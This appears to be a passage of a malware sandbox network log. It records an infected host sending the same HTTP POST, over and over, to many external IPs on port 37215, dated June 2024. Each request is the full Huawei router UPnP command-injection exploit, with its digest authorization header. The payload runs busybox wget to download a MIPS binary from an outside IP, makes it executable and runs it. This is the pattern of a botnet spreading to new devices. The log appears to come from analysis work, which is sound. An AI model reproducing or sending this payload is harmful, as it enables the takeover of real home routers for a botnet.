2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    218192.168.2.234172441.87.170.837215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.252592087 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    219192.168.2.233545841.53.249.7637215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.252650023 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    220192.168.2.2347716197.148.143.21837215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.252700090 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    221192.168.2.2357592156.94.219.637215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.252727985 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    222192.168.2.2355648197.218.44.21937215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.252765894 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    223192.168.2.2353806197.239.209.22437215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.252809048 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    224192.168.2.234553241.232.72.20737215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.252847910 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    225192.168.2.2339892197.176.79.10537215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.252899885 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    226192.168.2.234439441.24.85.12037215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.252942085 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    227192.168.2.2360494156.68.148.22937215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.252980947 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                    Session IDSource IPSource PortDestination IPDestination Port
                    228192.168.2.2355216156.37.13.9837215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:54.253014088 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
